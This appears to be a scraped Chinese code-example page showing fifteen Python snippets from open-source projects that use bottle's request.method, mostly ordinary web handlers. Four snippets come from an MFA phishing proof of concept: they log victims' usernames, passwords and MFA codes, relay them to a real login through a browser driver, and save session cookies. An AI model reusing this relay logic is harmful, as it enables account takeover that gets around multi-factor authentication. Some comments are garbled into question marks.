Python bottle.request 模块,method() 实例源码

我们从Python开源项目中,提取了以下15个代码示例,用于说明如何使用bottle.request.method()

项目:cloud-custodian    作者:capitalone    | 项目源码 | 文件源码
def init_audit(log_group):

    def audit(f):

        @functools.wraps(f)
        def handle(account_id, *args, **kw):
            envelope = {
                'timestamp': int(time.time() * 1000),
                'message': json.dumps({
                    'user': request.environ.get('REMOTE_USER', ''),
                    'url': request.url,
                    'path': request.path,
                    'method': request.method,
                    'pid': os.getpid(),
                    'account_id': account_id,
                    'ip': request.remote_addr})
            }
            transport.send_group("%s=%s" % (log_group, account_id), [envelope])
            return f(account_id, *args, **kw)

        return handle

    return audit
项目:behave-web-api    作者:jefersondaniel    | 项目源码 | 文件源码
def echo():
    try:
        body = request.body.read().decode('utf-8')
    except:
        body = None

    result = {
        'method': request.method,
        'headers': dict(request.headers),
        'body': body,
        'files': [
            {'key': key, 'name': request.files[key].raw_filename}
            for key in request.files
        ]
    }

    return result
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def dossologin():
    if request.method == 'OPTIONS':
        return {}
    else:
        request_params = request.query.decode()
        user_username = request_params['username']
        user_pass = request_params['pass']
        print('dossologin =======================================')
        print('User provided username: '+user_username)
        print('User provided password: '+user_pass)
        log('Username: '+str(user_username))
        log('Password: '+str(user_pass))
        auth_type = do_usernamepass_login(user_username, user_pass, global_driver)
        return auth_type

##########################################################################
# STAGE 2 - COLLECT MFA TOKEN OR ACCEPT NOTIFCATION
##########################################################################
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def checkload():
    """
    If the user doesn't have a sign in button, the phishing page will poll
    this to see if the page has been loaded
    """
    if request.method == 'OPTIONS':
        return {}
    else:
        currentURL = global_driver.current_url
        print('Current URL is: '+currentURL)
        if currentURL == PROTECTED_RESOURCE:
            return '1'
            print('Saving creds and screenshot')
            time.sleep(3)
            quicksave()
        else:
            return '0'
项目:henet    作者:AcrDijon    | 项目源码 | 文件源码
def enable_cors(func):
    def _enable_cors(*args, **kwargs):
        hds = response.headers
        hds['Access-Control-Allow-Origin'] = '*'
        hds['Access-Control-Allow-Methods'] = ', '.join(['PUT', 'GET',
                                                         'POST', 'DELETE',
                                                         'OPTIONS'])
        allow = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
        hds['Access-Control-Allow-Headers'] = allow
        if request.method != 'OPTIONS':
            return func(*args, **kwargs)
    return _enable_cors
项目:dd-trace-py    作者:DataDog    | 项目源码 | 文件源码
def apply(self, callback, route):

        def wrapped(*args, **kwargs):
            if not self.tracer or not self.tracer.enabled:
                return callback(*args, **kwargs)

            resource = "%s %s" % (request.method, request.route.rule)

            # Propagate headers such as x-datadog-trace-id.
            if self.distributed_tracing:
                propagator = HTTPPropagator()
                context = propagator.extract(request.headers)
                if context.trace_id:
                    self.tracer.context_provider.activate(context)

            with self.tracer.trace("bottle.request", service=self.service, resource=resource) as s:
                code = 0
                try:
                    return callback(*args, **kwargs)
                except Exception:
                    # bottle doesn't always translate unhandled exceptions, so
                    # we mark it here.
                    code = 500
                    raise
                finally:
                    s.set_tag(http.STATUS_CODE, code or response.status_code)
                    s.set_tag(http.URL, request.path)
                    s.set_tag(http.METHOD, request.method)

        return wrapped
项目:PythonSkillTree    作者:w4n9H    | 项目源码 | 文件源码
def printer():
    if request.method == 'POST':
        from project.models.Printer import Printer
        printer = Printer()
        message = printer.show_string(request.forms.get('text'))
        return template('printer/index', message=message)
    return template('printer/print', message='')
项目:aws-es-auth-proxy    作者:lucaagostini    | 项目源码 | 文件源码
def index():

    auth = AWS4Auth(config.aws_service_credentials.access_key, config.aws_service_credentials.secret_key, config.aws_service_region, config.aws_service_name)
    endpoint = config.aws_service_protocol + "://" + config.aws_service_endpoint + request.path + "?" + request.query_string
    proxy_req_header = {}
    for header in request.headers:
        if header.lower() in PROXY_REQ_HEADERS_WHITELIST:
            proxy_req_header[header] = request.headers[header]

    if request.method == "HEAD":
        requests_response = requests.head(endpoint, auth=auth, headers=proxy_req_header)
    elif request.method == "GET":
        requests_response = requests.get(endpoint, auth=auth, headers=proxy_req_header)
    elif request.method == "POST":
        proxy_req_body = request.body.getvalue()
        requests_response = requests.post(
            endpoint,
            auth=auth,
            data=proxy_req_body,
            headers=proxy_req_header)
    elif request.method == "PUT":
        proxy_req_body = request.body.getvalue()
        requests_response = requests.put(
            endpoint,
            auth=auth,
            data=proxy_req_body,
            headers=proxy_req_header)
    else:
        logging.error("Method not allowed")
    response.body = requests_response.content
    for header in requests_response.headers:
        if not header.lower() in PROXY_RESP_HEADERS_BLACKLIST:
            response.add_header(header, requests_response.headers[header])
    return response
项目:rill    作者:PermaData    | 项目源码 | 文件源码
def create_routes(host, port):
    """
    Define registry routes
    """
    @route("/runtimes/", method=['OPTIONS', 'GET'])
    def get_registry():
        """
        Get data about rill runtime
        """
        from rill.runtime import Runtime

        response.set_header('Access-Control-Allow-Origin', '*')
        response.set_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
        response.set_header('Allow', 'GET, OPTIONS')
        response.set_header(
            'Access-Control-Allow-Headers',
            'Content-Type, Authorization'
        )

        if request.method == 'OPTIONS':
            return 'GET,OPTIONS'

        response.content_type = 'application/json'

        runtime = Runtime()

        runtime_meta = runtime.get_runtime_meta()
        runtime_meta['address'] = address = 'ws://{}:{}'.format(host, port)
        runtime_meta['protocol'] = 'websocket'
        runtime_meta['id'] = 'rill_' + urlparse(address).netloc
        runtime_meta['seen'] = str(datetime.now())
        return json.dumps([runtime_meta])
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def domfa():
    """
    Web app method to accept, decode and parse parameters related
    to loggin in with MFA token. Calls do_mfa_code_entry to enter MFA.
    """
    if request.method == 'OPTIONS':
        return {}
    else:
        request_params = request.query.decode()
        user_mfa_code = request_params['code']
        print('domfa =======================================')
        print('User provided MFA Auth Code: '+user_mfa_code)
        do_mfa_code_entry(user_mfa_code, global_driver)
        return 'Ok'
项目:mfa_slipstream_poc    作者:decidedlygray    | 项目源码 | 文件源码
def quicksave():
    """Calling this will save cookies and whatnot to disk for later user"""
    print('FLASHSAVE: Cookies and screenshot')
    mfa_cookies = global_driver.get_cookies()
    print('  flashsaving cookies: '+str(mfa_cookies))
    save_obj(mfa_cookies,'cookies_'+get_timestamp()+'.txt') # load using add_cookies
    global_driver.get_screenshot_as_file('saves/screenie'+get_timestamp()+'.png')
    return '0x00000000'

##########################################################################
# BOTTLE CONFIGURATION/SETUP STUFF
##########################################################################
# Enable CORS - Future TODO: Communicate back to JavaScript auth method
#       and have the login portal properly set up auth method
# From: https://gist.github.com/richard-flosi/3789163
项目:xqz.es    作者:arahayrabedian    | 项目源码 | 文件源码
def contact(db):
    """
    Our contact-us form, basically, present a form if it's a GET request,
    validate and process the form if it's a POST request. Filthy but works.
    """
    form = ContactForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})
    if request.method == 'POST' and form.validate():
        # process the form, captcha is valid.

        message_text = "Contact Email: {email}\n\n {contact_text}".format(
            email=form.email.data,
            contact_text=form.contact_text.data
        )

        # put together a gmail client for sending messages
        gmail_client = GMail(settings.ADMIN_EMAIL,
                             settings.ADMIN_EMAIL_PASSWORD)
        message = Message('[xqzes] Contact Form',
                          to=settings.ADMIN_EMAIL,
                          text=message_text)
        gmail_client.send(message)

        return redirect("/contact/?contacted=True")

    return template(
        'contact',
        form=form,
        contacted=strtobool(request.GET.get('contacted', 'false'))
    )
项目:jerrybuild    作者:fboender    | 项目源码 | 文件源码
def generic_handler():
    """
    The generic handler catches all requests not caught by any other route. It
    checks the configuration to see if the URL requested is one registered as a
    job's webhook URL handler. If so, it normalizes the request and queues the
    job for building.

    It returns immediately (aynsc) with a JSON structure containing the job id.
    """
    jobdef_manager = request.deps['jobdef_manager']
    build_queue = request.deps['build_queue']
    config = request.deps['config']
    providers = request.deps['providers']

    jobdef = jobdef_manager.get_jobdef_from_url(request.path)
    if not jobdef:
        abort(404, "Not found")

    logging.info("Received event for job '{}'".format(jobdef.name))

    # Log debug info about the received request
    logging.debug("request environ: {}".format(request.environ))
    logging.debug("request path: {}".format(request.path))
    logging.debug("request method: {}".format(request.method))
    for k, v in request.headers.items():
        logging.debug("request header: {}={}".format(k, v))
    for k, v in request.query.items():
        logging.debug("request query: {}={}".format(k, v))
    logging.debug("request body: {}".format(request.body.read()))
    logging.debug("request auth: {}".format(request.auth))

    env = job.make_env(request, jobdef, providers)

    job_inst = jobdef.make_job(request.body.read().decode('utf8'), env)
    build_queue.put(job_inst)

    return {'id': job_inst.id}
项目:bottle_beginner    作者:denzow    | 项目源码 | 文件源码
def talk_api():
    """
    ?????????API

    GET -> ???????
    POST -> ???????

    json eg.

    [
        {
            talk_time:2016-09-17 15:00:49.937402
            username:sayamada
            chat_data:????
        }
    :
        },
        {
            talk_time:2016-09-17 15:58:03.200027
            username:sayamada
            chat_data:?????
        },
        {
            talk_time:2016-09-17 15:58:12.289631
            username:sayamada
            chat_data:??????
        }

    ]

    :return:
    """

    if request.method == "GET":
        talk_list = get_talk()
        return json.dumps(talk_list)

    elif request.method == "POST":
        # ????????????get????getunicode???
        chat_data = request.POST.getunicode("chat")
        # ????cookie????
        username = request.get_cookie("username")
        # ??????
        talk_time = datetime.now()
        # ????
        save_talk(talk_time, username, chat_data)

        return json.dumps({
            "status": "success"
        })
项目:xqz.es    作者:arahayrabedian    | 项目源码 | 文件源码
def submit(db):

    # TODO: break this out along with others in to an excuses package.
    class SubmissionForm(Form):
        attribution_name = StringField(
            'Your Name (for future attribution purposes)',
            [
                validators.InputRequired(),
                validators.Length(
                    min=3,
                    max=50,
                    message="Srsly, give us a decent username "
                            "(%(min)d - %(max)d chars),"
                            " doesn't even have to be real."
                )
            ]
        )
        excuse = TextAreaField(
            'What\'s YOUR excuse !?!?',
            [
                validators.Length(
                    min=5,
                    max=140,
                    message="Please provide %(min)d - %(max)d "
                            "characters"),
            ]
        )
        nocaptcha = NoCaptchaField(
            public_key=settings.RECAPTCHA_SITE_KEY,
            private_key=settings.RECAPTCHA_SECRET_KEY,
            secure=True,
        )

    form = SubmissionForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})

    submitted = False
    if request.method == 'POST' and form.validate():
        excuse_record = Excuse(form.attribution_name.data,
                               form.excuse.data)
        db.add(excuse_record)
        submitted = True

    return template('submit', form=form, submitted=submitted)